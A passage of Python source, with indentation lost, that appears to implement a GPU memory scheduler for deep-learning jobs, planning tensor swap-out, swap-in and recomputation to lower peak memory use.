self.start_time = None
self.end_time = None
self.time = time
self.run_time = run_time
self.access_type = access_type
if self.access_type == AccessType.output:
self.end_time = self.time
self.start_time = self.time - self.run_time
else:
self.start_time = self.time
self.end_time = self.time + self.run_time
self.release_flag = False
self.operation_id = operation_id
self.operation_name = operation_name
self.release_for_recomputation = []
def to_tuple(self):
return (self.tensor.tensor_id, self.time)
def __repr__(self):
return f'id={self.tensor.tensor_id}, start_time={self.start_time}, end_time={self.end_time}, time={self.time}, access_type={self.access_type}, release_flag={self.release_flag}'
class SwapTask(object):
'''Date weighted interval'''
def __init__(self, tensor, time, time_cost, task_type: TaskType, front_boundary=None, back_boundary=None):
self.tensor = tensor
self.time_cost = time_cost
self.data_type = np.float64
self.task_type = task_type
self.swap_task_id = None
assert not (front_boundary is None and back_boundary is None)
# 最早开始时间
self.front_boundary = front_boundary
# 最晚结束时间
self.back_boundary = back_boundary
self.time = time
self.execute_time = None
self.execute_ref = None
self.start_time_ = None
self.end_time_ = None
@property
def start_time(self):
return self.start_time_
@start_time.setter
def start_time(self, value):
self.start_time_ = value
if self.task_type == TaskType.swap_out:
self.time = self.start_time_
@property
def end_time(self):
return self.end_time_
@end_time.setter
def end_time(self, value):
self.end_time_ = value
if self.task_type == TaskType.swap_in:
self.time = self.end_time_
@classmethod
def from_access(cls, access: TensorAccess, weight, task_type, front_boundary=None, back_boundary=None):
return cls(access.tensor, weight, access.time, access.tensor.swap_time, task_type, front_boundary=front_boundary, back_boundary=back_boundary)
def __repr__(self):
return f'id={self.tensor}, type={self.task_type}, start_time={self.start_time}, end_time={self.end_time}, time={self.time}'
def numpy_ewma_vectorized(data, window):
alpha = 2 / (window + 1.0)
alpha_rev = 1 - alpha
n = data.shape[0]
pows = alpha_rev ** (np.arange(n + 1))
scale_arr = 1 / pows[:-1]
offset = data[0] * pows[1:]
pw0 = alpha * alpha_rev ** (n - 1)
mult = data * pw0 * scale_arr
cumsums = mult.cumsum()
out = offset + cumsums * scale_arr[::-1]
return out
debug_num = 0
def create_model(n):
model = Sequential()
model.add(Dense(units=2048, activation='tanh', input_dim=n))
model.add(Dense(units=2048, activation='tanh'))
model.add(Dense(units=1, activation='relu'))
return model
def load(opname, n):
model = create_model(n)
model.load_weights('model_parameter/' + opname + '_model.hdf5', by_name=True, skip_mismatch=True)
return model
def get_predicted_execution_time(op_name, inputs_of_model, logged_time: list):
return logged_time[0]
def liveness_analysis(tensor_access_list):
global tensor_access_by_tensor
# 活跃性分析结果生成
for job_id in range(len(tensor_access_list)):
tmp = set()
for i in range(len(tensor_access_list[job_id]) - 1, -1, -1):
tensor_access = tensor_access_list[job_id][i]
accesses_of_tensor = tensor_access_by_tensor[tensor_access.tensor.job_id][tensor_access.tensor]
if tensor_access.tensor not in tmp and len(accesses_of_tensor) > 1 and tensor_access == accesses_of_tensor[-1]:
# 参数不会释放
if not tensor_access.tensor.is_parameter:
tmp.add(tensor_access.tensor)
tensor_access.release_flag = True
def is_overlap(task: SwapTask, target: SwapTask):
return task != target and (
target.start_time < task.end_time < target.end_time or target.start_time < task.start_time < target.end_time or task.start_time < target.end_time < task.end_time or task.start_time < target.start_time < task.end_time)
def get_free_intervals(target_task, swap_schedule, access_of_target_tensor, key=0, asc=True):
target_task.tensor.update_swap_time()
# 列出在可行区间内的所有空白时间区间,并按区间排序
if target_task.back_boundary - target_task.front_boundary < target_task.time_cost:
return []
intervals = []
for task in swap_schedule:
# if target_task.back_boundary < task.start_time:
# continue
# elif task.end_time < target_task.front_boundary:
# break
if target_task.front_boundary <= task.start_time < task.end_time <= target_task.back_boundary:
intervals.append((task.start_time, task.end_time))
elif task.start_time < target_task.front_boundary < task.end_time < target_task.back_boundary:
intervals.append((target_task.front_boundary, task.end_time))
elif target_task.front_boundary < task.start_time < target_task.back_boundary < task.end_time:
intervals.append((task.start_time, target_task.back_boundary))
elif task.start_time < target_task.front_boundary < target_task.back_boundary < task.end_time:
return []
intervals = sorted(intervals, key=lambda x: x[0])
# 区间融合,确保区间之间无交集
occupied_intervals = []
i = 0
while i < len(intervals):
interval = intervals[i]
l = interval[0]
r = interval[1]
flag = False
while i < len(intervals) - 1 and intervals[i + 1][0] <= r:
r = max(r, intervals[i + 1][1])
flag = True
i += 1
occupied_intervals.append((l, r))
if not flag:
i += 1
not_occupied_intervals = []
s = target_task.front_boundary
for interval in occupied_intervals:
if s < interval[0]:
not_occupied_intervals.append((s, interval[0]))
s = interval[1]
if s < target_task.back_boundary:
not_occupied_intervals.append((s, target_task.back_boundary))
if len(not_occupied_intervals) == 0:
return []
i = 0
j = 0
# 按照区间起点排序
not_occupied_intervals = sorted(not_occupied_intervals, key=lambda x: x[key], reverse=False)
# 防止区间与被调度张量的access重合
while j < len(access_of_target_tensor):
if i >= len(not_occupied_intervals):
break
access = access_of_target_tensor[j]
start, end = not_occupied_intervals[i]
if start < access.start_time < end <= access.end_time:
not_occupied_intervals[i] = (start, access.start_time)
i += 1
elif start < access.start_time < access.end_time < end:
not_occupied_intervals[i] = (start, access.start_time)
not_occupied_intervals.insert(i + 1, (access.end_time, end))
i += 1
j += 1
elif start == access.start_time < end < access.end_time:
not_occupied_intervals.pop(i)
j += 1
elif access.start_time <= start < access.end_time < end:
not_occupied_intervals[i] = (access.end_time, end)
j += 1
elif access.start_time <= start < end <= access.end_time:
not_occupied_intervals.pop(i)
else:
j += 1
# 按照区间终点排序
if not asc:
not_occupied_intervals = sorted(not_occupied_intervals, key=lambda x: x[key], reverse=not asc)
return not_occupied_intervals
def generate_swap_recomputation_release_order(tensor_access_by_tensor, swap_scheduler, recomputations, job_num):
swap_orders = defaultdict(list)
release_orders = defaultdict(list)
recomp_orders = defaultdict(list)
for job_id in range(job_num):
# 按id排序
tensor_accesses = sorted([i for tmp in tensor_access_by_tensor[job_id].values() for i in tmp], key=lambda x: x.tensor.tensor_id)
# 按起始时间排序
swap_tasks = sorted(swap_scheduler[job_id], key=lambda x: x.start_time)
for i in range(len(swap_tasks)):
swap_tasks[i].swap_task_id = i
releases = []
swaps = []
recomps = []
for access in tensor_accesses:
if access.release_flag:
releases.append((access.operation_id, access.tensor.tensor_id))
release_orders[job_id] = releases
for access in recomputations:
recomps.append((access.operation_id, access.tensor.tensor_id, access.release_for_recomputation))
recomp_orders[job_id] = recomps
for task in swap_tasks:
# if task.task_type==TaskType.swap_out:
# (task_id, node_id(tensor_id), start_time, start_node, move_to_gpu, start_node_type)
ref = task.execute_ref.operation_id
swaps.append([task.tensor.tensor_id, task.execute_time, ref, 0 if task.task_type == TaskType.swap_out else 1, 1, task.start_time])
swap_orders[job_id] = list(map(lambda x: x[:-1], sorted(swaps, key=lambda x: x[-1])))
return release_orders, swap_orders, recomp_orders
def draw_all_task(tensor_access_by_tensor, swap_scheduler, job_num):
for job_id in range(job_num):
tmp = list(tensor_access_by_tensor[job_id].values())
res = []
for sub_list in tmp:
res.extend(sub_list)
draw(sorted(res, key=lambda x: x.start_time), swap_scheduler[job_id])
class MemoryAnalyzer:
def __init__(self, tensor_access_list, tensors):
self.tensor_access_list = tensor_access_list
self.tensors = tensors
self.next_swap_tasks_index = 0
def insert_sort(self, list_with_order: list, list_b: list, cmp):
# 升序
for obj_b in list_b:
i = 0
mid = 0
j = len(list_with_order) - 1
while i < j:
mid = (i + j) // 2
obj_mid = list_with_order[mid]
flag = cmp(obj_mid, obj_b)
if flag == -1:
# mid<b
if mid == i:
# i=mid<=j, mid<b, 比较b和j
flag2 = cmp(list_with_order[j], obj_b)
if flag2 == -1:
# i=mid<=j<b, 插入位置在j+1
mid = j
elif flag2 == 1:
# i=mid<b<j, 插入位置在j
mid = j - 1
else:
# i=mid<=j=b, 插入位置在j+1
mid = j
break
i = mid
elif flag == 1:
# b<mid
if mid == j:
# i<=mid=j, b<mid, 比较i和b
flag2 = cmp(list_with_order[i], obj_b)
if flag2 == -1:
# i<b<mid=j, 插入位置在i+1
mid = i
elif flag2 == 1:
# b<i<mid=j, 插入位置在i
mid = i - 1
else:
# i=b<mid=j, 插入位置在i+1
mid = i
break
j = mid
elif flag == 0:
# b==mid,插入位置在mid+1
break
list_with_order.insert(mid + 1, obj_b)
return list_with_order
def custom_cmp(self, x, y):
if x.time < y.time:
return -1
elif x.time > y.time:
return 1
else:
if x.start_time < y.start_time:
return -1
elif x.start_time > y.start_time:
return 1
else:
# if isinstance(x,TensorAccess) and isinstance(y, SwapTask):
# return 1
# elif isinstance(x, SwapTask) and isinstance(y, TensorAccess):
# return -1
return 0
def custom_cmp_end_time(self, x, y):
if x.end_time < y.end_time:
return -1
elif x.end_time > y.end_time:
return 1
else:
return 0
def get_max_memory_used(self, swap_tasks, swapped_out_tensor):
delta = len(swap_tasks)
if self.next_swap_tasks_index == 0:
# 初始化时间轴
tmp = copy.copy(self.tensor_access_list)
tmp.extend(swap_tasks)
self.time_axis = sorted(tmp, key=cmp_to_key(self.custom_cmp))
self.end_time_axis = sorted(copy.copy(tmp), key=cmp_to_key(self.custom_cmp_end_time))
# self.last_unused_swap_tasks = copy.copy(swap_tasks)
else:
# 更新时间轴
# assert swap_tasks[:self.next_swap_tasks_index] == self.last_unused_swap_tasks
# self.last_unused_swap_tasks = copy.copy(swap_tasks)
swap_tasks = swap_tasks[self.next_swap_tasks_index:]
self.time_axis = self.insert_sort(self.time_axis, swap_tasks, self.custom_cmp)
self.end_time_axis = self.insert_sort(self.end_time_axis, swap_tasks, self.custom_cmp_end_time)
self.index_of_end_time_axis = {self.end_time_axis[i]: i for i in range(len(self.end_time_axis))}
# 计算显存开销
# occupied by handle, cudnn, cuda stream and cudart
memory_used = 0
max_memory_actual = float('-inf')
in_gpu_tensors = set()
max_memory_tensors = set()
last_input_tensor_access = None
max_last_access = None
wait_to_be_released = []
max_time = None
# foot_print = {}
# 首先把输入的x,y以及所有没被swap out的参数载入显存,因为他们从上轮迭代结束时就一直在显存里面
for tensor in self.tensors:
if tensor.in_gpu_at_beginning and tensor not in swapped_out_tensor:
in_gpu_tensors.add(tensor)
memory_used += tensor.size
for time_index, event in enumerate(self.time_axis):
i = len(wait_to_be_released) - 1
while i >= 0:
access = wait_to_be_released[i]
# 如果此刻时间已经过了释放时间,则释放该访问的附带影响
if event.time >= access.end_time:
wait_to_be_released.pop(i)
memory_used -= access.tensor.size
in_gpu_tensors.remove(access.tensor)
i -= 1
if isinstance(event, TensorAccess):
if event.access_type == AccessType.output:
if event.tensor not in in_gpu_tensors:
# 新参数不额外占用空间
if event.operation_name not in optimizer_op:
memory_used += event.tensor.size
in_gpu_tensors.add(event.tensor)
else:
# 用完即释放的
# input本身并不增加gpu使用,swap in增加
if event.release_flag:
wait_to_be_released.append(event)
else:
last_input_tensor_access = event
elif isinstance(event, SwapTask):
# 使用按照结束时间排序的时间轴进行倒序查找
last_event = None
# idx = end_time_axis.index(event)
idx = self.index_of_end_time_axis[event]
for j in range(idx - 1, -1, -1):
if isinstance(self.end_time_axis[j], TensorAccess) and self.end_time_axis[j].end_time <= event.start_time:
last_event = self.end_time_axis[j]
break
if last_event is None:
last_event = self.tensor_access_list[0]
event.execute_ref = last_event
event.execute_time = event.start_time - last_event.end_time
if event.task_type == TaskType.swap_in:
memory_used += event.tensor.size
in_gpu_tensors.add(event.tensor)
else:
memory_used -= event.tensor.size
in_gpu_tensors.remove(event.tensor)
# foot_print[time] = memory_used
if memory_used > max_memory_actual:
# max_memory_actual与是否有考虑价值无关,单纯计量峰值
max_memory_actual = memory_used
max_memory_tensors = copy.copy(in_gpu_tensors)
max_last_access = last_input_tensor_access
max_time = event.time
self.next_swap_tasks_index = delta
return max_memory_actual, max_memory_tensors, max_last_access, max_time, self.time_axis
def run_global_memory_analysis(swap_tasks, swapped_out_tensor):
global job_num
global global_memory_analyzer
max_memory = 0
max_memory_tensors = []
last_input_accesses = []
max_time = []
# foot_prints = []
time_axis = []
for job_id in range(job_num):
job_max_memory, job_max_memory_tensors, last_input_access, now_time, t_axis = global_memory_analyzer[job_id].get_max_memory_used(swap_tasks[job_id], swapped_out_tensor)
time_axis.append(t_axis)
# foot_prints.append(foot_print)
max_memory_tensors.extend(job_max_memory_tensors)
last_input_accesses.append(last_input_access)
max_time.append(now_time)
max_memory += job_max_memory
return max_memory, max_memory_tensors, last_input_accesses, max_time, time_axis
def draw(tensor_access_list, swap_schedule):
df = []
id_color = {'OTA': 'rgb(255, 0, 102)', 'ITA': 'rgb(68, 114, 196)', 'Swap In': 'rgb(237, 137, 69)', 'Swap Out': 'rgb(112, 173, 71)'}
for tensor_access in tensor_access_list:
# input 蓝色,output红色
df.append(dict(Task=f'tensor_id:{tensor_access.tensor.tensor_id}, size:{tensor_access.tensor.size}', Start=tensor_access.start_time, Finish=tensor_access.end_time,
Resource='OTA' if tensor_access.access_type == AccessType.output else 'ITA'))
for task in swap_schedule:
df.append(dict(Task=f'tensor_id:{task.tensor.tensor_id}, size:{task.tensor.size}', Start=task.start_time, Finish=task.end_time, Resource='Swap In' if task.task_type == TaskType.swap_in else 'Swap Out'))
fig = ff.create_gantt(df, colors=id_color, index_col='Resource', group_tasks=True, show_colorbar=True, showgrid_x=True, showgrid_y=True, title=f'ratio={ratio}')
fig['layout']['xaxis'].update({'type': None})
fig.update_layout(
height=900,
width=1600,
)
pyplt(fig, filename=f'../../pic/job{tensor_access_list[0].tensor.job_id}.html', auto_open=True)
def try_swap_in(swap_in_task: SwapTask, swap_scheduler, access_of_target_tensor):
# swap_in越晚越好,按结束时间降序排序
free_intervals = get_free_intervals(swap_in_task, swap_scheduler[swap_in_task.tensor.job_id], access_of_target_tensor, 1, asc=False)
succeed = False
for interval in free_intervals:
if interval[1] - interval[0] >= swap_in_task.time_cost:
swap_in_task.end_time = interval[1]
swap_in_task.start_time = swap_in_task.end_time - swap_in_task.time_cost
swap_scheduler[swap_in_task.tensor.job_id].append(swap_in_task)
succeed = True
break
if not succeed:
return False
else:
return True
def can_next_input_access_swap_in(i, all_access_of_tensor, swap_out_task, swap_scheduler):
# 至少将第一个访问swap in才算成功,后续的能换入的话,则把前一个的release_flag设为True
access = all_access_of_tensor[i]
swap_in_task = SwapTask(access.tensor, access.time, access.tensor.swap_time, TaskType.swap_in,
front_boundary=swap_out_task.end_time if swap_out_task.end_time > all_access_of_tensor[i - 1].end_time else all_access_of_tensor[i - 1].end_time,
back_boundary=access.time)
return try_swap_in(swap_in_task, swap_scheduler, tensor_access_by_tensor[swap_in_task.tensor.job_id][swap_in_task.tensor])
def get_framework_info(info, logged_time, job_id):
global global_tensors
tensors = {}
tensor_access_list = []
global_time = 0
parameter = []
# tensor_id: execution time of operator which generate the tensor
operator_execution_time = []
# for output_tensor_id, input_tensor_id, output_tensor_size, operation_name, is_parameter, shape, inputs_of_model in info:
for tensor_info, input_tensor_id, operation_name, operation_id, is_parameter, inputs_of_model, _ in info:
# is_parameter: 生成的张量是否为参数
# 输入的为Byte
# 转换为MB
input_tensors = []
for tensor_id in input_tensor_id:
input_tensor = tensors[tensor_id]
input_tensors.append(input_tensor)
time_cost = get_predicted_execution_time(operation_name, inputs_of_model, logged_time[operation_id])
for output_tensor_id, output_tensor_size, shape in tensor_info:
output_tensor_size = output_tensor_size / 1000000
operator_execution_time.append(time_cost)
if operation_name in optimizer_op:
is_parameter = 1
output_tensor = Tensor(tensor_id=output_tensor_id, job_id=job_id, size=output_tensor_size, source_tensors=input_tensors, recomputation_time=time_cost, is_parameter=is_parameter, shape=shape)
output_access = TensorAccess(tensor=output_tensor, time=global_time + time_cost, run_time=time_cost, access_type=AccessType.output, operation_id=operation_id, operation_name=operation_name)
tensor_access_list.append(output_access)
tensors[output_tensor.tensor_id] = output_tensor
if is_parameter:
parameter.append(output_tensor)
for tensor_id in input_tensor_id:
input_tensor = tensors[tensor_id]
input_access = TensorAccess(tensor=input_tensor, time=global_time, run_time=time_cost, access_type=AccessType.input, operation_id=operation_id, operation_name=operation_name)
tensor_access_list.append(input_access)
global_time += time_cost
tensors = list(tensors.values())
global_tensors[job_id] = tensors
tensor_access_list = sorted(tensor_access_list, key=lambda x: x.time)
dic = defaultdict(list)
for access in tensor_access_list:
dic[access.tensor].append(access)
for k, v in dic.items():
dic[k] = sorted(v, key=lambda x: x.time)
tensor_access_by_tensor[job_id] = dic
swap_scheduler = []
# 对参数进行swap in调度
# earliest_swap = None
# earliest_time = float('inf')
# 从最早的参数开始安排
parameter = sorted(parameter, key=lambda x: dic[x][0].start_time)
return tensor_access_list, swap_scheduler, parameter, operator_execution_time
# 随机生成数据用的参数
times = 150
tensors = 50
time_scale = times
ratio = 1
# 全局变量
job_num = 0
global_tensor_access = [[]]
tensor_access_by_tensor = []
weight = 1
jobs_weights = []
# jobs_weight = [1, 1, 1, 1, 1]
total_memory = 0
enable_recomputation = True
global_graphs = []
global_tensors = {}
swap_scheduler = []
parameters = []
models = {}
global_memory_analyzer = []
# load_all_model()
def init(logged_times: list, gpu: int):
global job_num
global global_tensor_access
global tensor_access_by_tensor
global total_memory
global handle
global jobs_weights
global global_graphs
global global_tensors
global swap_scheduler
global parameters
global global_memory_analyzer
global_tensor_access = [[]]
tensor_access_by_tensor = []
global_tensors = {}
swap_scheduler = []
parameters = []
global_memory_analyzer = []
graphs = global_graphs
jobs_weights = [weight for _ in range(len(graphs))]
tensor_access_by_tensor = [[] for _ in range(job_num)]
# 获取当前剩余显存总量
if not debug_mod:
nvmlInit()
handle = nvmlDeviceGetHandleByIndex(gpu)
total_memory = nvmlDeviceGetMemoryInfo(handle).free / 1000000
else:
total_memory = 6000
job_num = len(graphs)
tmp = [get_framework_info(graphs[i], logged_times[i], i) for i in range(job_num)]
global_tensor_access = [tmp[i][0] for i in range(job_num)]
swap_scheduler = [tmp[i][1] for i in range(job_num)]
parameters = [tmp[i][2] for i in range(job_num)]
for i in range(job_num):
global_memory_analyzer.append(MemoryAnalyzer(global_tensor_access[i], global_tensors[i]))
def add_job(graph, job_id, gpu: int):
global global_graphs
assert job_id == len(global_graphs) or global_graphs[job_id] is None
if job_id == len(global_graphs):
global_graphs.append(graph)
else:
global_graphs[job_id] = graph
init([[] for _ in range(job_num)], gpu)
def remove_job(job_id, gpu: int):
global global_graphs
global_graphs[job_id] = None
init([], gpu)
def generate_scheduling_plan(logged_times, gpu: int):
# 如果是此时logged_times已经清空,则
# logged_times: [[(operation_id, [time, time, time])]],外层索引为job_id
global total_memory
global global_tensors
init(logged_times, gpu)
# 指数加权平均更新估计时间
tensor_nums = list(map(lambda x: len(x), tensor_access_by_tensor))
swap_out_number_limits = [int(weight * tensor_num) for weight, tensor_num in zip(jobs_weights, tensor_nums)]
swap_out_number = [0 for _ in tensor_nums]
swapped_out_tensor = set()
swapped_in_source_tensor = set()
swap_out_dict = {}
swapped_in_access = set()
recomputations = []
recomputation_tensor = set()
# key:tensor,value:[所有释放这个张量的重计算对应的在recomputations中的index]
# 上一轮没有成功的swap_out时为False
swapped_flag = True
recomputation_flag = True
iter = 0
original_memory_used = 0
last_memory_used = 0
job_id_ordered_by_weights = list(map(lambda x: x[0], sorted([(job_id, weights) for job_id, weights in enumerate(jobs_weights)], key=lambda x: x[1], reverse=True)))
max_memory_footprint = []
# draw_all_task(tensor_access_by_tensor, swap_scheduler, job_num)
while swapped_flag or (recomputation_flag and enable_recomputation):
# MB
if not debug_mod:
total_memory = nvmlDeviceGetMemoryInfo(handle).free / 1000000
else:
total_memory = 6000
max_memory, max_tensors, last_input_accesses, max_time, time_axis = run_global_memory_analysis(swap_scheduler, swapped_out_tensor)
max_memory_footprint.append(max_memory)
# 最后三次迭代的峰值,做一阶差分,结果的最大值大于上一次峰值的0.05%以上或迭代次数小于100轮才继续~`
if len(max_memory_footprint) > 3 and max([max_memory_footprint[i] - max_memory_footprint[i + 1] for i in range(len(max_memory_footprint) - 3, len(max_memory_footprint) - 1)]) < max_memory_footprint[
-1] * 0.0005 and iter > 100:
break
if iter == 0:
original_memory_used = max_memory
liveness_analysis(global_tensor_access)
else:
last_memory_used = max_memory
# print(f'iter:{iter}, max_memory:{max_memory}')
max_tensors = sorted(max_tensors, key=lambda x: x.size, reverse=True)
if swapped_flag:
swapped_flag = False
for tensor in max_tensors:
# 对该张量进行swap_out计划的安排
is_new_parameter = tensor.is_parameter and tensor_access_by_tensor[tensor.job_id][tensor][0].operation_name in optimizer_op and len(tensor_access_by_tensor[tensor.job_id][tensor]) == 1
if not is_new_parameter:
if swap_out_number[tensor.job_id] <= swap_out_number_limits[tensor.job_id] and len(tensor_access_by_tensor[tensor.job_id][tensor]) > 1:
# swapped_out表示所有可能的swap_in已经调度过了
if tensor not in swapped_out_tensor:
all_access_of_tensor = tensor_access_by_tensor[tensor.job_id][tensor][1:]
# 首先确定swap_out的时间范围,最迟不能超过此时此刻,最早不能超过第一次访问结束时刻
output_access = tensor_access_by_tensor[tensor.job_id][tensor][0]
assert output_access.access_type == AccessType.output
if last_input_accesses[tensor.job_id] is not None:
# 此时此刻
back_boundary = last_input_accesses[tensor.job_id].time
else:
last_time_access = tensor_access_by_tensor[tensor.job_id][tensor][-1]
back_boundary = last_time_access.time + tensor.swap_time
succeed = False
front_boundary = output_access.time
# failed_input_access = []
swap_out_succeed = True
have_next_ITA = True
# 如果是因为swap out放不下,则不用继续更新可行区间了,直接break
while not succeed and front_boundary < back_boundary and swap_out_succeed and have_next_ITA:
swap_out_task = SwapTask(tensor, output_access.time, tensor.swap_time, TaskType.swap_out, front_boundary=front_boundary, back_boundary=back_boundary)
free_intervals = get_free_intervals(swap_out_task, swap_scheduler[swap_out_task.tensor.job_id], tensor_access_by_tensor[tensor.job_id][tensor])
selected_first_access_index = None
# 选出能容纳该任务的剩余空间
swap_out_succeed = False
have_next_ITA = False
for interval in free_intervals:
if interval[1] - interval[0] >= swap_out_task.time_cost:
swap_out_succeed = True
swap_out_task.start_time = interval[0]
swap_out_task.end_time = swap_out_task.start_time + swap_out_task.time_cost
swap_scheduler[swap_out_task.tensor.job_id].append(swap_out_task)
# 看一下后面第一个swap_in能否放下
for i, access in enumerate(all_access_of_tensor):
# 找到后面第一个访问
if access.start_time >= swap_out_task.end_time:
have_next_ITA = True
if can_next_input_access_swap_in(i, all_access_of_tensor, swap_out_task, swap_scheduler):
swapped_out_tensor.add(tensor)
swap_out_dict[tensor] = swap_out_task
swapped_in_access.add(access)
swap_out_number[tensor.job_id] += 1
selected_first_access_index = i
succeed = True
swapped_flag = True
else:
# failed_input_access.append(access)
swap_scheduler[swap_out_task.tensor.job_id].remove(swap_out_task)
# 修正swap_out_task前向限制为这个失败的input_access的结束时间
front_boundary = access.end_time
assert tensor not in swapped_out_tensor
# swapped_out_tensor.remove(tensor)
break
if not succeed:
if swap_out_task in swap_scheduler[swap_out_task.tensor.job_id]:
swap_scheduler[swap_out_task.tensor.job_id].remove(swap_out_task)
# 如果不是因为swap out没安排下则重新生成区间
break
else:
break
# 安排失败
if not succeed:
continue
if not is_new_parameter:
# 后续的能换入的话,则把前一个的release_flag设为True
for i in range(selected_first_access_index + 1, len(all_access_of_tensor)):
access = all_access_of_tensor[i]
if i == 0 or access in swapped_in_access:
continue
else:
if can_next_input_access_swap_in(i, all_access_of_tensor, swap_out_task, swap_scheduler):
# print(f'成功{access}')
swapped_in_access.add(access)
if all_access_of_tensor[i - 1].start_time > swap_out_task.end_time:
all_access_of_tensor[i - 1].release_flag = True
if swapped_flag:
break
# 如果是新参数,则尝试对新参数进行swap out,对对应的旧参数进行swap in
else:
if tensor not in swapped_out_tensor:
output_access = tensor_access_by_tensor[tensor.job_id][tensor][0]
assert output_access.access_type == AccessType.output
swap_out_task = SwapTask(tensor, time=output_access.time, time_cost=tensor.swap_time, task_type=TaskType.swap_out, front_boundary=output_access.end_time, back_boundary=float('inf'))
free_intervals = get_free_intervals(swap_out_task, swap_scheduler[swap_out_task.tensor.job_id], tensor_access_by_tensor[tensor.job_id][tensor])
for interval in free_intervals:
if interval[1] - interval[0] >= swap_out_task.time_cost:
swap_out_task.start_time = interval[0]
swap_out_task.end_time = swap_out_task.start_time + swap_out_task.time_cost
swap_scheduler[swap_out_task.tensor.job_id].append(swap_out_task)
# 找到对应的旧参数张量
# 由于二者可行域无关,所以直接查看对应的swap in 能否调度
for t in tensor.source_tensors:
if t.is_parameter and t not in swapped_in_source_tensor:
# 试图swap in
# 找到第一次input访问(feed_dict不实际使用)
first_access = tensor_access_by_tensor[t.job_id][t][1]
assert first_access.access_type == AccessType.input
swap_in_task = SwapTask(t, first_access.time, first_access.tensor.swap_time, TaskType.swap_in, front_boundary=0, back_boundary=first_access.start_time)
res = try_swap_in(swap_in_task, swap_scheduler, tensor_access_by_tensor[t.job_id][t])
# assert not res, f'swap in parameter:{t} failed'
if res:
swapped_in_source_tensor.add(t)
swapped_out_tensor.add(tensor)
swap_out_dict[tensor] = swap_out_task
swapped_in_access.add(first_access)
swap_out_number[tensor.job_id] += 1
swapped_flag = True
else:
swap_scheduler[swap_out_task.tensor.job_id].remove(swap_out_task)
assert tensor not in swapped_out_tensor
break
break
elif enable_recomputation:
recomputation_flag = False
# 需要重计算
if max_memory >= total_memory:
for job_id in job_id_ordered_by_weights:
max_tensors_filtered = []
for tensor in max_tensors:
# 张量不是参数,没被逐出过,且他的所有源张量从未被swap或recomputation
if not tensor.is_parameter and tensor not in swapped_out_tensor and tensor.source_tensors is not None and len(tensor.source_tensors) > 0 and \
False not in [t not in swapped_out_tensor for t in tensor.source_tensors] and False not in [t not in recomputations for t in tensor.source_tensors]:
max_tensors_filtered.append(tensor)
if len(max_tensors_filtered) == 0:
continue
max_tensors_by_metric = sorted(max_tensors_filtered, key=lambda x: x.recomputation_metric, reverse=True)
# 选取metric最大的张量
tensor = max_tensors_by_metric[0]
# 找到此刻对应的下一个访问
now_time = max_time[job_id]
all_access_of_tensor = tensor_access_by_tensor[tensor.job_id][tensor]
for i, access in enumerate(all_access_of_tensor):
if access.access_type == AccessType.input and access not in recomputations:
if access.start_time >= now_time:
for source_tensor in access.tensor.source_tensors:
accesses = tensor_access_by_tensor[source_tensor.job_id][source_tensor]
for temp_acc in accesses:
# 确保source被release过的不进行重计算
if temp_acc.release_flag and temp_acc.end_time <= access.start_time:
break
else:
recomputations.append(access)
all_access_of_tensor[i - 1].release_flag = True
recomputation_flag = True
recomputation_tensor.add(access.tensor)
break
break
iter += 1
# fig = go.Figure(data=[go.Scatter(x=list(original_memory_footprint[0].keys()), y=list(original_memory_footprint[0].values())), go.Scatter(x=list(foot_prints[0].keys()), y=list(foot_prints[0].values()))])
# plotly.offline.plot(fig, filename='../../pic/footprint.html')
# if not debug_mod:
# total_memory = nvmlDeviceGetMemoryInfo(handle).free / 1000000
# else:
# total_memory = 6000
# stats = 'succeed' if max_memory < total_memory else ' failure'
# print(f'scheduling {stats}')
# draw_all_task(tensor_access_by_tensor, swap_scheduler, job_num)
memory_saved_ratio = format((1 - last_memory_used / original_memory_used) * 100, '.2f')
print(f'memory_saved_ratio:{memory_saved_ratio}%')
print(f'swap ratio:{len(swap_scheduler[0]) / len(global_tensors)}')
# print(f'recomputations:{recomputations}')
return generate_swap_recomputation_release_order(tensor_access_by_tensor, swap_scheduler, recomputations, job_num)
def multiprocess_init(global_message_queue: multiprocessing.Queue, global_control_queue: multiprocessing.Queue, total_job_number):
# swap_order = [(20, 0, 20, 0)]
# control_messages = []
# control_message = [swap_order, [], []]
# control_messages.append(control_message)
# global_control_queue.put(control_messages)
logged_times = []
log_repeat = 0
alpha = 0.9
second_schedule_finished = False
# todo 设置从executor到algorithm的job_id的映射
map_out_to_in = {}
map_in_to_out = {}
global job_num
job_num = 0
while True:
if not global_message_queue.empty():
global_message = global_message_queue.get()
job_id = global_message[0]
message_type = global_message[1][0]
message_graph = global_message[1][1]
if message_type == 0:
# print("job_id =", job_id)
job_num += 1
map_out_to_in[job_id] = job_num - 1
map_in_to_out[job_num - 1] = job_id
job_id_in = job_num - 1
logged_times.append([])
global_graphs.append(message_graph)
tensor_num = len(message_graph)
# with open("../../global_graphs", "wb") as f1:
# pickle.dump(global_graphs, f1)
for i in range(tensor_num):
# print(message_graph[i][6])
logged_times[job_id_in].append([message_graph[i][6]])
s = time.time()
if job_num == total_job_number:
release_order, swap_order, recomputation_order = generate_scheduling_plan(logged_times, 0)
print(f'time:{time.time() - s}')
control_messages = {}
for i in range(job_num):
# print(swap_order)
control_message = [swap_order[i], release_order[i], recomputation_order[i]]
control_messages[map_in_to_out[i]] = control_message
global_control_queue.put(control_messages)
else:
job_id_in = map_out_to_in[job_id]
total_time_old = 0
for run_time in logged_times[job_id_in]:
total_time_old += run_time[0]
total_time_new = 0
for run_time in message_graph:
total_time_new += run_time[1]
change_rate = abs(total_time_new - total_time_old) / total_time_old
print("change rate is ", change_rate)
# print("total time new is", total_time_new)
# print("total time old is", total_time_old)
if change_rate > 0.3:
is_replan = True
else:
is_replan = False
# with open("./log/total_time.txt", "a") as f1:
# print(total_time_new, file=f1)
# todo 此处控制了在一定轮数之后才进行决策
log_repeat += 1
if log_repeat > 0 and (is_replan or (not second_schedule_finished)):
second_schedule_finished = True
# with open("../../logged_times", "wb") as f1:
# pickle.dump(logged_times, f1)
for node_message in message_graph:
time_new = node_message[1] * alpha + logged_times[job_id_in][node_message[0]][0] * (1 - alpha)
logged_times[job_id_in][node_message[0]] = [time_new]
release_order, swap_order, recomputation_order = generate_scheduling_plan(logged_times, 0)
print(logged_times)
control_messages = {}
for i in range(job_num):
print(swap_order)
control_message = [swap_order[i], release_order[i], recomputation_order[i]]
control_messages[map_in_to_out[i]] = control_message
global_control_queue.put(control_messages)
# print(logged_times[0])
if debug_mod and __name__ == '__main__':
import pickle
with open('../../global_graphs', 'rb') as f:
g = pickle.load(f)
global_graphs = g
with open('../../logged_times', 'rb') as f:
